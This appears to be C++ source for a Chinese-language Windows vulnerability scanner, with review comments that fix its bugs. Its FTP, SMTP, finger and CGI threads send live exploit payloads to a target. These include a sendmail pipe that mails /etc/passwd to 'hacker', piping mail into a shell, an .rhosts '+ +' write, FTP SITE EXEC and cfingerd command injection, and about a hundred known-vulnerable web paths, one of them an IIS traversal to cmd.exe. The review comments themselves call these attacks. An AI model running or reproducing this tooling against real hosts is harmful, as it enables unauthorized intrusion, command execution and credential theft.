send(sockfd,"MKD ftpbug\r\n",sizeof("MKD ftpbug\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
memset(rbuff,0,1024);
(dlg->m_HistoryEdit).AppendString ("尝试执行Shell:");
send(sockfd,"SITE EXEC sh -c id\r\n",sizeof("SITE EXEC sh -c id\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
(dlg->m_HistoryEdit).AppendString (rbuff);
send(sockfd,"QUIT\r\n",sizeof("QUIT\r\n"),0);
Sleep(1000);
recv(sockfd,rbuff,sizeof(rbuff),0);
Sleep(1000);
closesocket(sockfd);
fEvent.SetEvent();
return 0;
}
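// SMTP probe thread.
//
// pParam is the owning CScanDlg; the target comes from the file-global rmt_host,
// every reply is appended to m_HistoryEdit, and fEvent is signalled on every
// exit path so whoever waits on it is never left hanging.
//
// NOTE(review): this is not a passive check. Several lines in the "bug" table
// ("mail from: |/bin/mail hacker < /etc/passwd", "mail from: |tail|sh", the
// /tmp/.rhosts recipient) are live exploitation attempts against old sendmail;
// sending them to a host you are not authorised to test is an attack, not a scan.

// One SMTP round trip: write a command line, pace for a second, read one reply.
// rbuff is always NUL-terminated on return -- recv() never terminates for us,
// and a full-size reply would otherwise leave strstr()/AppendString reading
// past the end of the buffer. Returns the number of reply bytes, 0 on send
// failure or when nothing came back.
static int smtpExchange(SOCKET s, const char* cmd, char* rbuff, int cap)
{
    rbuff[0] = '\0';
    // strlen(), not sizeof(): sizeof("HELP\r\n") counts the terminating NUL and
    // would push a stray 0x00 onto the wire after every command.
    if (send(s, cmd, (int)strlen(cmd), 0) == SOCKET_ERROR)
        return 0;
    Sleep(1000);
    int n = recv(s, rbuff, cap - 1, 0);
    if (n <= 0)
    {
        rbuff[0] = '\0';
        return 0;
    }
    rbuff[n] = '\0';
    return n;
}

UINT sScan(LPVOID pParam)
{
    CScanDlg* dlg = (CScanDlg*)pParam;
    char rbuff[1024];
    int rcpt = 0, expn = 0;
    int a;
    const int port = 25;

    // Account names tried through RCPT TO when the HELP reply advertises it.
    static const char* const username[] = {
        "root","test","www","web","sybase","oracle","informix",
        "guest","sam_exec","+","oracle8","access","user","ftp",
        "account","backup","owc","datebase","public","info",
        "wais","news","bbs","adm","sync","john","beijing","china"};
    // Raw command lines sent verbatim, one per probe (see the NOTE above).
    // The empty first entry sends a bare CRLF.
    static const char* const bug[] = {
        "","debug","kill","wiz","rcpt to: /tmp/.rhosts","+ +","RSET",
        "mail from: |/bin/mail hacker < /etc/passwd","RSET",
        "mail from: |tail|sh"};
    const int userCount = (int)(sizeof(username) / sizeof(username[0]));
    const int bugCount = (int)(sizeof(bug) / sizeof(bug[0]));

    SOCKET sockfd = socket(AF_INET, SOCK_STREAM, 0);
    // SOCKET is unsigned on Winsock, so the old "sockfd < 0" test could never fire.
    if (sockfd == INVALID_SOCKET)
    {
        (dlg->m_HistoryEdit).AppendString ("无法建立Socket\r\n");
        fEvent.SetEvent();   // signal like every other exit path
        return 0;
    }

    SOCKADDR_IN addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(rmt_host);
    if (addr.sin_addr.s_addr == INADDR_NONE)
    {
        // inet_addr() only accepts a dotted quad; anything else would
        // otherwise be sent to the broadcast address.
        (dlg->m_HistoryEdit).AppendString ("无效的目标地址\r\n");
        closesocket(sockfd);
        fEvent.SetEvent();
        return 0;
    }
    if (connect(sockfd, (struct sockaddr*)&addr, sizeof(addr)) == SOCKET_ERROR)
    {
        (dlg->m_HistoryEdit).AppendString ("目标没有开放SMTP服务...\r\n");
        closesocket(sockfd);   // was leaked on this path
        fEvent.SetEvent();
        return 0;
    }
    // Bound every recv() so a server that accepts the connection but never
    // answers cannot pin this thread forever.
    DWORD recvTimeoutMs = 10000;
    setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, (const char*)&recvTimeoutMs, sizeof(recvTimeoutMs));

    (dlg->m_HistoryEdit).AppendString ("SMTP服务器的Banner:");
    int n = recv(sockfd, rbuff, sizeof(rbuff) - 1, 0);
    rbuff[n > 0 ? n : 0] = '\0';   // recv() does not terminate the buffer
    (dlg->m_HistoryEdit).AppendString (rbuff);

    // HELP tells us which enumeration verbs the server admits to.
    smtpExchange(sockfd, "HELP\r\n", rbuff, sizeof(rbuff));
    (dlg->m_HistoryEdit).AppendString (rbuff);
    if (strstr(rbuff, "RCPT") != NULL)
    {
        rcpt = 1;
        (dlg->m_HistoryEdit).AppendString ("可以使用RCPT命令获得用户名列表.\r\n");
    }
    if (strstr(rbuff, "VRFY") != NULL)
    {
        (dlg->m_HistoryEdit).AppendString ("可以使用VRFY命令获得用户名列表.\r\n");
    }
    if (strstr(rbuff, "EXPN") != NULL)
    {
        expn = 1;
        (dlg->m_HistoryEdit).AppendString ("可以使用EXPN命令获得用户名列表.\r\n");
    }

    // RFC 821/2821 require a domain after HELO; a bare "HELO" draws 501 from
    // conforming servers, and the MAIL FROM that follows is then rejected as
    // out of sequence, which made the RCPT enumeration below silently useless.
    smtpExchange(sockfd, "HELO localhost\r\n", rbuff, sizeof(rbuff));
    (dlg->m_HistoryEdit).AppendString (rbuff);
    smtpExchange(sockfd, "MAIL FROM:hacker@hacker.com\r\n", rbuff, sizeof(rbuff));
    (dlg->m_HistoryEdit).AppendString (rbuff);

    if (rcpt)
    {
        (dlg->m_HistoryEdit).AppendString ("尝试利用RCPT命令获得目标机上存在的一些常见用户名:");
        for (a = 0; a < userCount; a++)
        {
            // Build the line in a CString rather than a fixed 50-byte char[].
            CString cmd = "rcpt to:";
            cmd += username[a];
            cmd += "\r\n";
            smtpExchange(sockfd, (LPCTSTR)cmd, rbuff, sizeof(rbuff));
            // The reply code is the first three characters; strstr("250")
            // would also match a "250" buried in a hostname or message text.
            if (strncmp(rbuff, "250", 3) == 0)
                (dlg->m_HistoryEdit).AppendString (rbuff);
        }
    }

    // decode/uudecode aliases that pipe mail into a decoder are a classic
    // sendmail hole; ask with EXPN when the server offers it, VRFY otherwise.
    const char* verb = expn ? "EXPN" : "VRFY";
    (dlg->m_HistoryEdit).AppendString ("\r\n检查decode别名:\r\n");
    CString query = verb;
    query += " decode\r\n";
    smtpExchange(sockfd, (LPCTSTR)query, rbuff, sizeof(rbuff));
    (dlg->m_HistoryEdit).AppendString (rbuff);
    query = verb;
    query += " uudecode\r\n";
    smtpExchange(sockfd, (LPCTSTR)query, rbuff, sizeof(rbuff));
    (dlg->m_HistoryEdit).AppendString (rbuff);

    for (a = 0; a < bugCount; a++)
    {
        CString dis = "\r\n检查";
        dis += bug[a];
        dis += "漏洞";
        (dlg->m_HistoryEdit).AppendString (dis);
        CString cmd = bug[a];
        cmd += "\r\n";
        smtpExchange(sockfd, (LPCTSTR)cmd, rbuff, sizeof(rbuff));
        (dlg->m_HistoryEdit).AppendString (rbuff);
    }

    // Close the session cleanly instead of just dropping the TCP connection.
    smtpExchange(sockfd, "QUIT\r\n", rbuff, sizeof(rbuff));
    closesocket(sockfd);
    fEvent.SetEvent();
    return 0;
}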
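// finger probe thread.
//
// pParam is the owning CScanDlg; the target comes from the file-global rmt_host,
// each reply goes to m_HistoryEdit, and fEvent is signalled on every exit path.
//
// NOTE(review): the cfingerd and "/bin/id" lines are command-injection
// attempts, not passive checks -- only run them against hosts you are
// authorised to test.

// Issue one finger query on its own TCP connection and read the reply.
// RFC 1288 fingerd answers exactly one query and then closes the connection,
// so the old code, which pushed four queries down a single socket, only ever
// delivered the first one. rbuff is NUL-terminated on return.
// Returns -1 if no socket could be created, 0 if the connection failed,
// 1 otherwise (including an empty reply).
static int fingerQuery(const char* query, char* rbuff, int cap)
{
    rbuff[0] = '\0';
    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET)   // SOCKET is unsigned; the old "< 0" test never fired
        return -1;
    SOCKADDR_IN addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(79);
    addr.sin_addr.s_addr = inet_addr(rmt_host);
    if (addr.sin_addr.s_addr == INADDR_NONE ||
        connect(s, (struct sockaddr*)&addr, sizeof(addr)) == SOCKET_ERROR)
    {
        closesocket(s);
        return 0;
    }
    DWORD recvTimeoutMs = 10000;   // never block this thread forever on a silent server
    setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (const char*)&recvTimeoutMs, sizeof(recvTimeoutMs));
    // strlen(), not sizeof(): sizeof() would send the literal's NUL as well.
    if (send(s, query, (int)strlen(query), 0) != SOCKET_ERROR)
    {
        Sleep(1000);
        int n = recv(s, rbuff, cap - 1, 0);
        rbuff[n > 0 ? n : 0] = '\0';   // recv() does not terminate the buffer
    }
    closesocket(s);
    return 1;
}

UINT fingerScan(LPVOID pParam)
{
    char rbuff[1024];
    CScanDlg* dlg = (CScanDlg*)pParam;
    // Label printed before each probe, and the query line sent for it.
    static const struct { const char* label; const char* query; } probes[] = {
        { "测试SunOS fingerd列出用户名漏洞:",       "1234\r\n" },
        { "测试cfingerd执行任意命令漏洞:",           "/W;/bin/id;#\r\n" },
        { "测试某些finger服务器执行任意命令漏洞:", "/bin/id\r\n" },
        { "测试dot漏洞:",                            ".\r\n" }
    };
    const int probeCount = (int)(sizeof(probes) / sizeof(probes[0]));

    for (int i = 0; i < probeCount; i++)
    {
        int r = fingerQuery(probes[i].query, rbuff, sizeof(rbuff));
        if (r < 0)
        {
            (dlg->m_HistoryEdit).AppendString ("无法建立Socket\r\n");
            break;
        }
        if (r == 0)
        {
            (dlg->m_HistoryEdit).AppendString ("目标没有开放FINGER服务...\r\n");
            break;
        }
        (dlg->m_HistoryEdit).AppendString (probes[i].label);
        (dlg->m_HistoryEdit).AppendString (rbuff);
    }
    fEvent.SetEvent();   // signalled on every exit path so the waiter is never stuck
    return 0;
}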
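// CGI probe thread: grab the HTTP banner, then request every path in cginame
// through getcgi() worker threads, ten at a time.
//
// pParam is the owning CScanDlg; the target comes from the file-global rmt_host.
// Thread[] / hThread[] are file-level bookkeeping arrays declared elsewhere
// (presumably CWinThread* and HANDLE, ten of each -- they are indexed 0..9
// here); a batch owns them until its wait returns. fEvent is signalled on
// every exit path.
UINT cgiScan(LPVOID pParam)
{
    char rbuff[1024];
    CScanDlg* dlg = (CScanDlg*)pParam;
    // Paths whose mere presence was, at the time, a known hole. The table used
    // to be declared char*[100] and then filled with 101 entries -- the write
    // to cginame[100] ran one past the end -- so it is now sized by its
    // initializer and the batch loop walks all of it. The two exact duplicates
    // ("/cgi-bin/aglimpse" and "/cgi-bin/htmlscript" listed twice) are dropped.
    static const char* const cginame[] = {
        "/cgi-bin/unlg1.1",
        "/cgi-bin/gH.cgi",
        "/cgi-bin/rwwwshell.pl",
        "/cgi-bin/phf",
        "/cgi-bin/Count.cgi",
        "/cgi-bin/test-cgi",
        "/cgi-bin/nph-test-cgi",
        "/cgi-bin/php.cgi",
        "/cgi-bin/php",
        "/cgi-bin/handler",
        "/cgi-bin/webgais",
        "/cgi-bin/websendmail",
        "/cgi-bin/guestbook",
        "/cgi-bin/webdist.cgi",
        "/cgi-bin/faxsurvey",
        "/cgi-bin/htmlscript",
        "/cgi-bin/pfdispaly.cgi",
        "/cgi-win/perl.exe",
        "/cgi-bin/perl",
        "/cgi-bin/wwwboard.pl",
        "/cgi-bin/wwwboard.cgi",
        "/cgi-bin/www-sql",
        "/cgi-bin/view-source",
        "/cgi-bin/wwwadmin.pl",
        "/cgi-bin/formmail.pl",
        "/cgi-bin/sendform.cgi",
        "/cgi-bin/wrap",
        "/cgi-bin/cgiwrap",
        "/cgi-bin/edit.pl",
        "/cgi-bin/perlshop.cgi",
        "/cgi-bin/webbbs.cgi",
        "/cgi-bin/whois_raw.cgi",
        "/cgi-bin/AnyBoard.cgi",
        "/cgi-bin/rguest.exe",
        "/cgi-bin/campas",
        "/cgi-bin/aglimpse",
        "/cgi-bin/glimpse",
        "/cgi-bin/man.sh",
        "/cgi-bin/AT-admin.cgi",
        "/cgi-bin/filemail.pl",
        "/cgi-bin/maillist.pl",
        "/cgi-bin/jj",
        "/cgi-bin/info2www",
        "/cgi-bin/files.pl",
        "/cgi-bin/finger",
        "/cgi-bin/bnbform.cgi",
        "/cgi-bin/survey.cgi",
        "/cgi-bin/AnyForm2",
        "/cgi-bin/textcounter.pl",
        "/cgi-bin/classifieds.cgi",
        "/cgi-bin/environ.cgi",
        "/_vti_pvt/service.pwd",
        "/_vti_pvt/users.pwd",
        "/_vti_pvt/authors.pwd",
        "/_vti_pvt/administrators.pwd",
        "/_vti_pvt/shtml.dll",
        "/_vti_pvt/shtml.exe",
        "/_vti_bin/fpexe",
        "/cgi-dos/args.bat",
        "/cgi-dos/args.cmd",
        "/cgi-win/uploader.exe",
        "/cgi-win/wguest.exe",
        "/cgi-bin/wguest.exe",
        "/scripts/wguest.exe",
        "/scripts/issadmin/bdir.htr",
        "/scripts/CGImail.exe",
        "/scripts/tools/getdrvs.exe",
        "/scripts/tools/newdsn.exe",
        "/scripts/fpcount.exe",
        "/scripts/counter.exe",
        "/scripts/visadmin.exe",
        "/cfdocs/expelval/openfile.cfm",
        "/cfdocs/expelval/exprcalc.cfm",
        "/cfdocs/expelval/displayopenedfile.cfm",
        "/cfdocs/expelval/sendmail.cfm",
        "/search97.vts",
        "/carbo.dll",
        "/?PageServices",
        "/cgi-bin/guestbook.cgi",
        "/scripts/..%c1%1c../winnt/system32/cmd.exe",
        "/photoads/ads_data.pl",
        "/photoads/cgi-bin/env.cgi",
        "/cgi-bin/photo_cfg.pl",
        "/password.log",
        "/password.dat",
        "/cgi-bin/password.log",
        "/cgi-bin/password.dat",
        "/~root",
        "/cgi-bin/upload.pl",
        "/iisadmpwd/achg.htr",
        "/iisadmpwd/aexp.htr",
        "/cgi-bin/fpcount.exe",
        "//scripts/repost.asp",
        "/_vti_inf.html",
        "/msadc/Samples/SELECTOR/showcode.asp",
        "/iisadmpwd/aexp2.htr",
        "/iissamples/exair/search/advsearch.asp",
        "/scripts/convert.bas",
        "/scripts/lsass.exe"
    };
    const int pathCount = (int)(sizeof(cginame) / sizeof(cginame[0]));
    const int batchSize = 10;   // matches the size of Thread[] / hThread[]
    struct cgi mycgi[10];

    SOCKET sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET)   // SOCKET is unsigned; the old "< 0" test never fired
    {
        (dlg->m_HistoryEdit).AppendString ("无法建立Socket\r\n");
        fEvent.SetEvent();   // signal like every other exit path
        return 0;
    }
    SOCKADDR_IN addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);
    addr.sin_addr.s_addr = inet_addr(rmt_host);
    if (addr.sin_addr.s_addr == INADDR_NONE ||
        connect(sockfd, (struct sockaddr*)&addr, sizeof(addr)) == SOCKET_ERROR)
    {
        (dlg->m_HistoryEdit).AppendString ("目标没有开放WWW服务...\r\n");
        closesocket(sockfd);   // was leaked on this path
        fEvent.SetEvent();
        return 0;
    }
    DWORD recvTimeoutMs = 10000;   // do not hang on a server that never answers
    setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, (const char*)&recvTimeoutMs, sizeof(recvTimeoutMs));

    (dlg->m_HistoryEdit).AppendString ("WWW服务器的Banner:");
    // CRLF line ends as HTTP requires, and strlen() so the literal's NUL is not sent.
    static const char banner[] = "HEAD / HTTP/1.0\r\n\r\n";
    if (send(sockfd, banner, (int)strlen(banner), 0) != SOCKET_ERROR)
    {
        Sleep(1000);
        int n = recv(sockfd, rbuff, sizeof(rbuff) - 1, 0);
        rbuff[n > 0 ? n : 0] = '\0';   // recv() does not terminate the buffer
        (dlg->m_HistoryEdit).AppendString (rbuff);
    }
    closesocket(sockfd);

    (dlg->m_HistoryEdit).AppendString ("开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...\r\n");
    for (int start = 0; start < pathCount; start += batchSize)
    {
        int batch = pathCount - start;
        if (batch > batchSize)
            batch = batchSize;
        int started = 0;
        for (int j = 0; j < batch; j++)
        {
            mycgi[j].rmt_host = rmt_host;
            mycgi[j].mydlg = dlg;
            mycgi[j].url = (char*)cginame[start + j];   // struct cgi::url is a plain char*; the literal is never written
            mycgi[j].n = j;
            // Create suspended with auto-delete off. An auto-deleting CWinThread
            // destroys itself -- and closes m_hThread -- the moment the thread
            // function returns, which left hThread[] holding dead handles while
            // WaitForMultipleObjects below was still using them.
            CWinThread* t = AfxBeginThread(getcgi, (LPVOID)&mycgi[j],
                                           THREAD_PRIORITY_NORMAL, 0, CREATE_SUSPENDED);
            if (t == NULL)
                continue;   // this path is simply skipped; the rest of the batch still runs
            t->m_bAutoDelete = FALSE;
            Thread[started] = t;
            hThread[started] = t->m_hThread;
            started++;
            t->ResumeThread();
        }
        if (started == 0)
            continue;
        // 120 s cap so one hung worker cannot stall the whole scan.
        WaitForMultipleObjects(started, hThread, TRUE, 120000);
        for (int k = 0; k < started; k++)
        {
            if (WaitForSingleObject(hThread[k], 0) == WAIT_OBJECT_0)
                delete Thread[k];                 // finished: we own the object now
            else
                Thread[k]->m_bAutoDelete = TRUE;  // still running past the cap: let it clean itself up
        }
    }
    fEvent.SetEvent();
    return 0;
}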
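// Worker for cgiScan(): fetch one path and report it if the server answers 200.
//
// pParam points at a struct cgi filled in by cgiScan(): url (the path to
// request), rmt_host (dotted-quad target) and mydlg (dialog to report into).
// Always returns 0.
//
// NOTE(review): a 200 only says the path exists -- or that the server answers
// 200 for everything; catch-all / soft-404 servers will light up every entry.
// It does not prove the path is the vulnerable version; confirm by hand.
UINT getcgi(LPVOID pParam)
{
    char rbuff[1024];
    struct cgi* tcgi = (struct cgi*)pParam;
    const char* hole = tcgi->url;
    const char* host = tcgi->rmt_host;   // renamed: the old local shadowed the file-global rmt_host
    CScanDlg* dlg = tcgi->mydlg;

    // CRLF line ends as HTTP requires; a Host: header so name-based virtual
    // hosts answer for the requested site rather than the default one.
    CString request = "GET ";
    request += hole;
    request += " HTTP/1.0\r\nHost: ";
    request += host;
    request += "\r\n\r\n";

    SOCKET sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET)   // SOCKET is unsigned; the old "< 0" test never fired
    {
        // The old code called exit(0) here, tearing down the whole GUI process
        // from a worker thread. A worker that cannot run just reports nothing.
        return 0;
    }
    SOCKADDR_IN addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);
    addr.sin_addr.s_addr = inet_addr(host);
    // connect() used to be ignored: send/recv on an unconnected socket just
    // produced an empty buffer and a silent "not found".
    if (addr.sin_addr.s_addr == INADDR_NONE ||
        connect(sockfd, (struct sockaddr*)&addr, sizeof(addr)) == SOCKET_ERROR)
    {
        closesocket(sockfd);
        return 0;
    }
    // Bound recv(): cgiScan() waits at most 120 s per batch, and a server that
    // accepts but never answers would otherwise pin this thread for good.
    DWORD recvTimeoutMs = 10000;
    setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, (const char*)&recvTimeoutMs, sizeof(recvTimeoutMs));

    rbuff[0] = '\0';
    if (send(sockfd, (LPCTSTR)request, request.GetLength(), 0) != SOCKET_ERROR)
    {
        Sleep(1000);
        int n = recv(sockfd, rbuff, sizeof(rbuff) - 1, 0);
        rbuff[n > 0 ? n : 0] = '\0';   // recv() never terminates the buffer
    }
    closesocket(sockfd);

    // Read the code from the status line ("HTTP/1.x 200 ...") instead of
    // strstr("200 OK"), which also matched that text anywhere in an error page.
    int ok = 0;
    if (strncmp(rbuff, "HTTP/", 5) == 0)
    {
        const char* sp = strchr(rbuff, ' ');
        ok = (sp != NULL && strncmp(sp + 1, "200", 3) == 0);
    }
    if (ok)
    {
        CString display = "\t发现";
        display += hole;
        display += "漏洞\r\n";
        (dlg->m_HistoryEdit).AppendString (display);
    }
    return 0;
}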